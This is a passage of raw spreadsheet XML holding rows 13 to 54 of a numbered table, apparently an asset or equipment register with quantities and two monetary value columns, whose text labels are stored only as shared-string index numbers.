      <c r="D13" s="252" t="s">
        <v>2430</v>
      </c>
      <c r="E13" s="253" t="s">
        <v>2431</v>
      </c>
      <c r="F13" s="155"/>
      <c r="G13" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H13" s="152">
        <v>1</v>
      </c>
      <c r="I13" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J13" s="161">
        <v>8138</v>
      </c>
      <c r="K13" s="160">
        <v>2276.4</v>
      </c>
      <c r="L13" s="154"/>
      <c r="M13" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="14" customHeight="1" spans="2:13">
      <c r="B14" s="148">
        <v>8</v>
      </c>
      <c r="C14" s="251" t="s">
        <v>2432</v>
      </c>
      <c r="D14" s="252" t="s">
        <v>2433</v>
      </c>
      <c r="E14" s="253" t="s">
        <v>2434</v>
      </c>
      <c r="F14" s="155"/>
      <c r="G14" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H14" s="152">
        <v>1</v>
      </c>
      <c r="I14" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J14" s="161">
        <v>44198.36</v>
      </c>
      <c r="K14" s="160">
        <v>14851.2</v>
      </c>
      <c r="L14" s="154"/>
      <c r="M14" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="15" customHeight="1" spans="2:13">
      <c r="B15" s="148">
        <v>9</v>
      </c>
      <c r="C15" s="251" t="s">
        <v>2435</v>
      </c>
      <c r="D15" s="252" t="s">
        <v>2436</v>
      </c>
      <c r="E15" s="253" t="s">
        <v>2437</v>
      </c>
      <c r="F15" s="155"/>
      <c r="G15" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H15" s="152">
        <v>1</v>
      </c>
      <c r="I15" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J15" s="161">
        <v>15650</v>
      </c>
      <c r="K15" s="160">
        <v>5241.6</v>
      </c>
      <c r="L15" s="154" t="s">
        <v>2438</v>
      </c>
      <c r="M15" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="16" customHeight="1" spans="2:13">
      <c r="B16" s="148">
        <v>10</v>
      </c>
      <c r="C16" s="251" t="s">
        <v>2439</v>
      </c>
      <c r="D16" s="252" t="s">
        <v>2440</v>
      </c>
      <c r="E16" s="253" t="s">
        <v>2441</v>
      </c>
      <c r="F16" s="155"/>
      <c r="G16" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H16" s="152">
        <v>1</v>
      </c>
      <c r="I16" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J16" s="161">
        <v>15290</v>
      </c>
      <c r="K16" s="160">
        <v>4256</v>
      </c>
      <c r="L16" s="154"/>
      <c r="M16" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="17" customHeight="1" spans="2:13">
      <c r="B17" s="148">
        <v>11</v>
      </c>
      <c r="C17" s="251" t="s">
        <v>2442</v>
      </c>
      <c r="D17" s="252" t="s">
        <v>2443</v>
      </c>
      <c r="E17" s="253" t="s">
        <v>2444</v>
      </c>
      <c r="F17" s="155"/>
      <c r="G17" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H17" s="152">
        <v>1</v>
      </c>
      <c r="I17" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J17" s="161">
        <v>175410.94</v>
      </c>
      <c r="K17" s="160">
        <v>49112</v>
      </c>
      <c r="L17" s="154"/>
      <c r="M17" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="18" customHeight="1" spans="2:13">
      <c r="B18" s="148">
        <v>12</v>
      </c>
      <c r="C18" s="251" t="s">
        <v>2445</v>
      </c>
      <c r="D18" s="252" t="s">
        <v>2446</v>
      </c>
      <c r="E18" s="154" t="s">
        <v>2447</v>
      </c>
      <c r="F18" s="155"/>
      <c r="G18" s="152" t="s">
        <v>1410</v>
      </c>
      <c r="H18" s="152">
        <v>1</v>
      </c>
      <c r="I18" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J18" s="161">
        <v>22000</v>
      </c>
      <c r="K18" s="160">
        <v>7392</v>
      </c>
      <c r="L18" s="154"/>
      <c r="M18" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="19" customHeight="1" spans="2:13">
      <c r="B19" s="148">
        <v>13</v>
      </c>
      <c r="C19" s="251" t="s">
        <v>2448</v>
      </c>
      <c r="D19" s="252" t="s">
        <v>2449</v>
      </c>
      <c r="E19" s="253" t="s">
        <v>2450</v>
      </c>
      <c r="F19" s="155"/>
      <c r="G19" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H19" s="152">
        <v>1</v>
      </c>
      <c r="I19" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J19" s="161">
        <v>26030</v>
      </c>
      <c r="K19" s="160">
        <v>8736</v>
      </c>
      <c r="L19" s="154"/>
      <c r="M19" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="20" customHeight="1" spans="2:13">
      <c r="B20" s="148">
        <v>14</v>
      </c>
      <c r="C20" s="251" t="s">
        <v>2451</v>
      </c>
      <c r="D20" s="252" t="s">
        <v>1092</v>
      </c>
      <c r="E20" s="253" t="s">
        <v>2452</v>
      </c>
      <c r="F20" s="155"/>
      <c r="G20" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H20" s="152">
        <v>2</v>
      </c>
      <c r="I20" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J20" s="161">
        <v>12930</v>
      </c>
      <c r="K20" s="160">
        <v>1444.8</v>
      </c>
      <c r="L20" s="154"/>
      <c r="M20" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="21" customHeight="1" spans="2:13">
      <c r="B21" s="148">
        <v>15</v>
      </c>
      <c r="C21" s="251" t="s">
        <v>2453</v>
      </c>
      <c r="D21" s="252" t="s">
        <v>2454</v>
      </c>
      <c r="E21" s="253" t="s">
        <v>2455</v>
      </c>
      <c r="F21" s="155"/>
      <c r="G21" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H21" s="152">
        <v>1</v>
      </c>
      <c r="I21" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J21" s="161">
        <v>47462.41</v>
      </c>
      <c r="K21" s="160">
        <v>15926.4</v>
      </c>
      <c r="L21" s="154"/>
      <c r="M21" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="22" customHeight="1" spans="2:13">
      <c r="B22" s="148">
        <v>16</v>
      </c>
      <c r="C22" s="251" t="s">
        <v>2456</v>
      </c>
      <c r="D22" s="252" t="s">
        <v>2457</v>
      </c>
      <c r="E22" s="253" t="s">
        <v>2458</v>
      </c>
      <c r="F22" s="155"/>
      <c r="G22" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H22" s="152">
        <v>1</v>
      </c>
      <c r="I22" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J22" s="161">
        <v>99066</v>
      </c>
      <c r="K22" s="160">
        <v>33264</v>
      </c>
      <c r="L22" s="154"/>
      <c r="M22" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="23" customHeight="1" spans="2:13">
      <c r="B23" s="148">
        <v>17</v>
      </c>
      <c r="C23" s="251" t="s">
        <v>2459</v>
      </c>
      <c r="D23" s="252" t="s">
        <v>2460</v>
      </c>
      <c r="E23" s="253" t="s">
        <v>2461</v>
      </c>
      <c r="F23" s="155"/>
      <c r="G23" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H23" s="152">
        <v>1</v>
      </c>
      <c r="I23" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J23" s="161">
        <v>24248.6</v>
      </c>
      <c r="K23" s="160">
        <v>6776</v>
      </c>
      <c r="L23" s="154"/>
      <c r="M23" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="24" customHeight="1" spans="2:13">
      <c r="B24" s="148">
        <v>18</v>
      </c>
      <c r="C24" s="251" t="s">
        <v>2462</v>
      </c>
      <c r="D24" s="252" t="s">
        <v>2463</v>
      </c>
      <c r="E24" s="154" t="s">
        <v>2464</v>
      </c>
      <c r="F24" s="155"/>
      <c r="G24" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H24" s="152">
        <v>1</v>
      </c>
      <c r="I24" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J24" s="161">
        <v>78892.42</v>
      </c>
      <c r="K24" s="160">
        <v>22064</v>
      </c>
      <c r="L24" s="154"/>
      <c r="M24" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="25" customHeight="1" spans="2:13">
      <c r="B25" s="148">
        <v>19</v>
      </c>
      <c r="C25" s="251" t="s">
        <v>2465</v>
      </c>
      <c r="D25" s="252" t="s">
        <v>2466</v>
      </c>
      <c r="E25" s="154" t="s">
        <v>2467</v>
      </c>
      <c r="F25" s="155"/>
      <c r="G25" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H25" s="152">
        <v>1</v>
      </c>
      <c r="I25" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J25" s="161">
        <v>44538</v>
      </c>
      <c r="K25" s="160">
        <v>12460</v>
      </c>
      <c r="L25" s="154" t="s">
        <v>2468</v>
      </c>
      <c r="M25" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="26" customHeight="1" spans="2:13">
      <c r="B26" s="148">
        <v>20</v>
      </c>
      <c r="C26" s="251" t="s">
        <v>2469</v>
      </c>
      <c r="D26" s="252" t="s">
        <v>2470</v>
      </c>
      <c r="E26" s="154"/>
      <c r="F26" s="155"/>
      <c r="G26" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H26" s="152">
        <v>1</v>
      </c>
      <c r="I26" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J26" s="161">
        <v>23930</v>
      </c>
      <c r="K26" s="160">
        <v>8030.4</v>
      </c>
      <c r="L26" s="154"/>
      <c r="M26" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="27" customHeight="1" spans="2:13">
      <c r="B27" s="148">
        <v>21</v>
      </c>
      <c r="C27" s="251" t="s">
        <v>2471</v>
      </c>
      <c r="D27" s="252" t="s">
        <v>2472</v>
      </c>
      <c r="E27" s="154" t="s">
        <v>2473</v>
      </c>
      <c r="F27" s="155"/>
      <c r="G27" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H27" s="152">
        <v>2</v>
      </c>
      <c r="I27" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J27" s="161">
        <v>92473</v>
      </c>
      <c r="K27" s="160">
        <v>31046.4</v>
      </c>
      <c r="L27" s="154" t="s">
        <v>2474</v>
      </c>
      <c r="M27" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="28" customHeight="1" spans="2:13">
      <c r="B28" s="148">
        <v>22</v>
      </c>
      <c r="C28" s="251" t="s">
        <v>2475</v>
      </c>
      <c r="D28" s="252" t="s">
        <v>539</v>
      </c>
      <c r="E28" s="154"/>
      <c r="F28" s="155"/>
      <c r="G28" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H28" s="152">
        <v>2</v>
      </c>
      <c r="I28" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J28" s="161">
        <v>9401.71</v>
      </c>
      <c r="K28" s="160">
        <v>1052.8</v>
      </c>
      <c r="L28" s="154"/>
      <c r="M28" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="29" customHeight="1" spans="2:13">
      <c r="B29" s="148">
        <v>23</v>
      </c>
      <c r="C29" s="251" t="s">
        <v>2476</v>
      </c>
      <c r="D29" s="252" t="s">
        <v>2477</v>
      </c>
      <c r="E29" s="154" t="s">
        <v>2478</v>
      </c>
      <c r="F29" s="155"/>
      <c r="G29" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H29" s="152">
        <v>1</v>
      </c>
      <c r="I29" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J29" s="161">
        <v>47024</v>
      </c>
      <c r="K29" s="160">
        <v>15792</v>
      </c>
      <c r="L29" s="154"/>
      <c r="M29" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="30" customHeight="1" spans="2:13">
      <c r="B30" s="148">
        <v>24</v>
      </c>
      <c r="C30" s="251" t="s">
        <v>2479</v>
      </c>
      <c r="D30" s="252" t="s">
        <v>2454</v>
      </c>
      <c r="E30" s="253" t="s">
        <v>2437</v>
      </c>
      <c r="F30" s="155"/>
      <c r="G30" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H30" s="152">
        <v>1</v>
      </c>
      <c r="I30" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J30" s="161">
        <v>15300</v>
      </c>
      <c r="K30" s="160">
        <v>1713.6</v>
      </c>
      <c r="L30" s="154"/>
      <c r="M30" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="31" customHeight="1" spans="2:13">
      <c r="B31" s="148">
        <v>25</v>
      </c>
      <c r="C31" s="251" t="s">
        <v>2480</v>
      </c>
      <c r="D31" s="252" t="s">
        <v>2481</v>
      </c>
      <c r="E31" s="253" t="s">
        <v>2482</v>
      </c>
      <c r="F31" s="155"/>
      <c r="G31" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H31" s="152">
        <v>1</v>
      </c>
      <c r="I31" s="251" t="s">
        <v>2483</v>
      </c>
      <c r="J31" s="161">
        <v>76200</v>
      </c>
      <c r="K31" s="160">
        <v>4267.2</v>
      </c>
      <c r="L31" s="154"/>
      <c r="M31" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="32" customHeight="1" spans="2:13">
      <c r="B32" s="148">
        <v>26</v>
      </c>
      <c r="C32" s="251" t="s">
        <v>2484</v>
      </c>
      <c r="D32" s="252" t="s">
        <v>2485</v>
      </c>
      <c r="E32" s="154" t="s">
        <v>2486</v>
      </c>
      <c r="F32" s="155"/>
      <c r="G32" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H32" s="152">
        <v>1</v>
      </c>
      <c r="I32" s="251" t="s">
        <v>2483</v>
      </c>
      <c r="J32" s="161">
        <v>53398.06</v>
      </c>
      <c r="K32" s="160">
        <v>12792</v>
      </c>
      <c r="L32" s="154"/>
      <c r="M32" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="33" customHeight="1" spans="2:13">
      <c r="B33" s="148">
        <v>27</v>
      </c>
      <c r="C33" s="251" t="s">
        <v>2487</v>
      </c>
      <c r="D33" s="252" t="s">
        <v>2488</v>
      </c>
      <c r="E33" s="253" t="s">
        <v>2458</v>
      </c>
      <c r="F33" s="155"/>
      <c r="G33" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H33" s="152">
        <v>1</v>
      </c>
      <c r="I33" s="251" t="s">
        <v>2489</v>
      </c>
      <c r="J33" s="161">
        <v>94871.79</v>
      </c>
      <c r="K33" s="160">
        <v>28819.2</v>
      </c>
      <c r="L33" s="162" t="s">
        <v>2490</v>
      </c>
      <c r="M33" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="34" customHeight="1" spans="2:13">
      <c r="B34" s="148">
        <v>28</v>
      </c>
      <c r="C34" s="251" t="s">
        <v>2491</v>
      </c>
      <c r="D34" s="252" t="s">
        <v>2492</v>
      </c>
      <c r="E34" s="253" t="s">
        <v>2493</v>
      </c>
      <c r="F34" s="155"/>
      <c r="G34" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H34" s="152">
        <v>1</v>
      </c>
      <c r="I34" s="251" t="s">
        <v>2489</v>
      </c>
      <c r="J34" s="161">
        <v>67521.37</v>
      </c>
      <c r="K34" s="160">
        <v>20520</v>
      </c>
      <c r="L34" s="163"/>
      <c r="M34" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="35" customHeight="1" spans="2:13">
      <c r="B35" s="148">
        <v>29</v>
      </c>
      <c r="C35" s="251" t="s">
        <v>2494</v>
      </c>
      <c r="D35" s="252" t="s">
        <v>2495</v>
      </c>
      <c r="E35" s="253" t="s">
        <v>2496</v>
      </c>
      <c r="F35" s="155"/>
      <c r="G35" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H35" s="152">
        <v>1</v>
      </c>
      <c r="I35" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J35" s="161">
        <v>117796</v>
      </c>
      <c r="K35" s="160">
        <v>32956</v>
      </c>
      <c r="L35" s="154" t="s">
        <v>2497</v>
      </c>
      <c r="M35" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="36" customHeight="1" spans="2:13">
      <c r="B36" s="148">
        <v>30</v>
      </c>
      <c r="C36" s="251" t="s">
        <v>2498</v>
      </c>
      <c r="D36" s="252" t="s">
        <v>2499</v>
      </c>
      <c r="E36" s="253" t="s">
        <v>2500</v>
      </c>
      <c r="F36" s="155"/>
      <c r="G36" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H36" s="152">
        <v>1</v>
      </c>
      <c r="I36" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J36" s="161">
        <v>20982</v>
      </c>
      <c r="K36" s="160">
        <v>7022.4</v>
      </c>
      <c r="L36" s="154" t="s">
        <v>2438</v>
      </c>
      <c r="M36" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="37" customHeight="1" spans="2:13">
      <c r="B37" s="148">
        <v>31</v>
      </c>
      <c r="C37" s="251" t="s">
        <v>2501</v>
      </c>
      <c r="D37" s="252" t="s">
        <v>681</v>
      </c>
      <c r="E37" s="253" t="s">
        <v>2502</v>
      </c>
      <c r="F37" s="155"/>
      <c r="G37" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H37" s="152">
        <v>1</v>
      </c>
      <c r="I37" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J37" s="161">
        <v>9482</v>
      </c>
      <c r="K37" s="160">
        <v>1052.8</v>
      </c>
      <c r="L37" s="154"/>
      <c r="M37" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="38" customHeight="1" spans="2:13">
      <c r="B38" s="148">
        <v>32</v>
      </c>
      <c r="C38" s="251" t="s">
        <v>2503</v>
      </c>
      <c r="D38" s="252" t="s">
        <v>2504</v>
      </c>
      <c r="E38" s="253" t="s">
        <v>2441</v>
      </c>
      <c r="F38" s="155"/>
      <c r="G38" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H38" s="152">
        <v>1</v>
      </c>
      <c r="I38" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J38" s="161">
        <v>114328.28</v>
      </c>
      <c r="K38" s="160">
        <v>38304</v>
      </c>
      <c r="L38" s="154"/>
      <c r="M38" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="39" customHeight="1" spans="2:13">
      <c r="B39" s="148">
        <v>33</v>
      </c>
      <c r="C39" s="251" t="s">
        <v>2505</v>
      </c>
      <c r="D39" s="252" t="s">
        <v>1324</v>
      </c>
      <c r="E39" s="253" t="s">
        <v>2506</v>
      </c>
      <c r="F39" s="155"/>
      <c r="G39" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H39" s="152">
        <v>1</v>
      </c>
      <c r="I39" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J39" s="161">
        <v>2299</v>
      </c>
      <c r="K39" s="160">
        <v>256.48</v>
      </c>
      <c r="L39" s="154"/>
      <c r="M39" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="40" customHeight="1" spans="2:13">
      <c r="B40" s="148">
        <v>34</v>
      </c>
      <c r="C40" s="251" t="s">
        <v>2507</v>
      </c>
      <c r="D40" s="252" t="s">
        <v>2508</v>
      </c>
      <c r="E40" s="253" t="s">
        <v>2509</v>
      </c>
      <c r="F40" s="155"/>
      <c r="G40" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H40" s="152">
        <v>1</v>
      </c>
      <c r="I40" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J40" s="161">
        <v>25389</v>
      </c>
      <c r="K40" s="160">
        <v>7084</v>
      </c>
      <c r="L40" s="154"/>
      <c r="M40" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="41" customHeight="1" spans="2:13">
      <c r="B41" s="148">
        <v>35</v>
      </c>
      <c r="C41" s="251" t="s">
        <v>2510</v>
      </c>
      <c r="D41" s="252" t="s">
        <v>2511</v>
      </c>
      <c r="E41" s="253" t="s">
        <v>2512</v>
      </c>
      <c r="F41" s="155"/>
      <c r="G41" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H41" s="152">
        <v>3</v>
      </c>
      <c r="I41" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J41" s="161">
        <v>56000</v>
      </c>
      <c r="K41" s="160">
        <v>18816</v>
      </c>
      <c r="L41" s="154"/>
      <c r="M41" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="42" customHeight="1" spans="2:13">
      <c r="B42" s="148">
        <v>36</v>
      </c>
      <c r="C42" s="251" t="s">
        <v>2513</v>
      </c>
      <c r="D42" s="252" t="s">
        <v>2514</v>
      </c>
      <c r="E42" s="253" t="s">
        <v>2515</v>
      </c>
      <c r="F42" s="155"/>
      <c r="G42" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H42" s="152">
        <v>10</v>
      </c>
      <c r="I42" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J42" s="161">
        <v>394645</v>
      </c>
      <c r="K42" s="160">
        <v>132585.6</v>
      </c>
      <c r="L42" s="154"/>
      <c r="M42" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="43" customHeight="1" spans="2:13">
      <c r="B43" s="148">
        <v>37</v>
      </c>
      <c r="C43" s="251" t="s">
        <v>2516</v>
      </c>
      <c r="D43" s="252" t="s">
        <v>2517</v>
      </c>
      <c r="E43" s="154" t="s">
        <v>2518</v>
      </c>
      <c r="F43" s="155"/>
      <c r="G43" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H43" s="152">
        <v>1</v>
      </c>
      <c r="I43" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J43" s="161">
        <v>4708.78</v>
      </c>
      <c r="K43" s="160">
        <v>1579.2</v>
      </c>
      <c r="L43" s="154" t="s">
        <v>2519</v>
      </c>
      <c r="M43" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="44" customHeight="1" spans="2:13">
      <c r="B44" s="148">
        <v>38</v>
      </c>
      <c r="C44" s="251" t="s">
        <v>2520</v>
      </c>
      <c r="D44" s="252" t="s">
        <v>2521</v>
      </c>
      <c r="E44" s="253" t="s">
        <v>2522</v>
      </c>
      <c r="F44" s="155"/>
      <c r="G44" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H44" s="152">
        <v>1</v>
      </c>
      <c r="I44" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J44" s="161">
        <v>15650</v>
      </c>
      <c r="K44" s="160">
        <v>5241.6</v>
      </c>
      <c r="L44" s="154"/>
      <c r="M44" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="45" customHeight="1" spans="2:13">
      <c r="B45" s="148">
        <v>39</v>
      </c>
      <c r="C45" s="251" t="s">
        <v>2523</v>
      </c>
      <c r="D45" s="252" t="s">
        <v>2524</v>
      </c>
      <c r="E45" s="253" t="s">
        <v>2525</v>
      </c>
      <c r="F45" s="155"/>
      <c r="G45" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H45" s="152">
        <v>2</v>
      </c>
      <c r="I45" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J45" s="161">
        <v>26750</v>
      </c>
      <c r="K45" s="160">
        <v>7476</v>
      </c>
      <c r="L45" s="154"/>
      <c r="M45" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="46" customHeight="1" spans="2:13">
      <c r="B46" s="148">
        <v>40</v>
      </c>
      <c r="C46" s="251" t="s">
        <v>2526</v>
      </c>
      <c r="D46" s="252" t="s">
        <v>2527</v>
      </c>
      <c r="E46" s="154" t="s">
        <v>2528</v>
      </c>
      <c r="F46" s="155"/>
      <c r="G46" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H46" s="152">
        <v>1</v>
      </c>
      <c r="I46" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J46" s="161">
        <v>2877</v>
      </c>
      <c r="K46" s="160">
        <v>8036</v>
      </c>
      <c r="L46" s="154" t="s">
        <v>2529</v>
      </c>
      <c r="M46" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="47" customHeight="1" spans="2:13">
      <c r="B47" s="148">
        <v>41</v>
      </c>
      <c r="C47" s="251" t="s">
        <v>2530</v>
      </c>
      <c r="D47" s="252" t="s">
        <v>2531</v>
      </c>
      <c r="E47" s="253" t="s">
        <v>2532</v>
      </c>
      <c r="F47" s="155"/>
      <c r="G47" s="152" t="s">
        <v>592</v>
      </c>
      <c r="H47" s="152">
        <v>1</v>
      </c>
      <c r="I47" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J47" s="161">
        <v>9000</v>
      </c>
      <c r="K47" s="160">
        <v>1008</v>
      </c>
      <c r="L47" s="154" t="s">
        <v>2533</v>
      </c>
      <c r="M47" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="48" customHeight="1" spans="2:13">
      <c r="B48" s="148">
        <v>42</v>
      </c>
      <c r="C48" s="251" t="s">
        <v>2534</v>
      </c>
      <c r="D48" s="252" t="s">
        <v>2535</v>
      </c>
      <c r="E48" s="253" t="s">
        <v>2536</v>
      </c>
      <c r="F48" s="155"/>
      <c r="G48" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H48" s="152">
        <v>2</v>
      </c>
      <c r="I48" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J48" s="161">
        <v>6500</v>
      </c>
      <c r="K48" s="160">
        <v>728</v>
      </c>
      <c r="L48" s="154"/>
      <c r="M48" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="49" customHeight="1" spans="2:13">
      <c r="B49" s="148">
        <v>43</v>
      </c>
      <c r="C49" s="251" t="s">
        <v>2537</v>
      </c>
      <c r="D49" s="252" t="s">
        <v>2538</v>
      </c>
      <c r="E49" s="253" t="s">
        <v>2539</v>
      </c>
      <c r="F49" s="155"/>
      <c r="G49" s="152" t="s">
        <v>466</v>
      </c>
      <c r="H49" s="152">
        <v>1</v>
      </c>
      <c r="I49" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J49" s="161">
        <v>331500</v>
      </c>
      <c r="K49" s="160">
        <v>92820</v>
      </c>
      <c r="L49" s="154" t="s">
        <v>2540</v>
      </c>
      <c r="M49" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="50" customHeight="1" spans="2:13">
      <c r="B50" s="148">
        <v>44</v>
      </c>
      <c r="C50" s="251" t="s">
        <v>2541</v>
      </c>
      <c r="D50" s="252" t="s">
        <v>2542</v>
      </c>
      <c r="E50" s="253" t="s">
        <v>2543</v>
      </c>
      <c r="F50" s="155"/>
      <c r="G50" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H50" s="152">
        <v>1</v>
      </c>
      <c r="I50" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J50" s="161">
        <v>41865</v>
      </c>
      <c r="K50" s="160">
        <v>11704</v>
      </c>
      <c r="L50" s="154"/>
      <c r="M50" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="51" customHeight="1" spans="2:13">
      <c r="B51" s="148">
        <v>45</v>
      </c>
      <c r="C51" s="249" t="s">
        <v>2544</v>
      </c>
      <c r="D51" s="250" t="s">
        <v>2545</v>
      </c>
      <c r="E51" s="150"/>
      <c r="F51" s="151"/>
      <c r="G51" s="148" t="s">
        <v>466</v>
      </c>
      <c r="H51" s="148">
        <v>1</v>
      </c>
      <c r="I51" s="249" t="s">
        <v>2418</v>
      </c>
      <c r="J51" s="159">
        <v>94727.87</v>
      </c>
      <c r="K51" s="160">
        <v>10606.4</v>
      </c>
      <c r="L51" s="150" t="s">
        <v>2546</v>
      </c>
      <c r="M51" s="249" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="52" customHeight="1" spans="2:13">
      <c r="B52" s="148">
        <v>46</v>
      </c>
      <c r="C52" s="249" t="s">
        <v>2547</v>
      </c>
      <c r="D52" s="250" t="s">
        <v>2548</v>
      </c>
      <c r="E52" s="150"/>
      <c r="F52" s="151"/>
      <c r="G52" s="148" t="s">
        <v>1410</v>
      </c>
      <c r="H52" s="148">
        <v>6</v>
      </c>
      <c r="I52" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J52" s="161">
        <v>138844.3</v>
      </c>
      <c r="K52" s="160">
        <v>46636.8</v>
      </c>
      <c r="L52" s="154" t="s">
        <v>2549</v>
      </c>
      <c r="M52" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="53" customHeight="1" spans="2:13">
      <c r="B53" s="148">
        <v>47</v>
      </c>
      <c r="C53" s="251" t="s">
        <v>2550</v>
      </c>
      <c r="D53" s="252" t="s">
        <v>2463</v>
      </c>
      <c r="E53" s="154" t="s">
        <v>2464</v>
      </c>
      <c r="F53" s="155"/>
      <c r="G53" s="152" t="s">
        <v>507</v>
      </c>
      <c r="H53" s="152">
        <v>1</v>
      </c>
      <c r="I53" s="251" t="s">
        <v>2418</v>
      </c>
      <c r="J53" s="161">
        <v>27437</v>
      </c>
      <c r="K53" s="160">
        <v>7672</v>
      </c>
      <c r="L53" s="154"/>
      <c r="M53" s="251" t="s">
        <v>2408</v>
      </c>
    </row>
    <row r="54" customHeight="1" spans="2:13">
      <c r="B54" s="148">
        <v>48</v>
      </c>
      <c r="C54" s="251" t="s">
        <v>2551</v>
      </c>
      <c r="D54" s="252" t="s">
        <v>2552</v>
      </c>
      <c r="E54" s="154"/>
      <c r="F54" s="155"/>
      <c r="G54" s="152" t="s">
        <v>223</v>
      </c>
      <c r="H54" s="152">
        <v>1</v>
      </c>
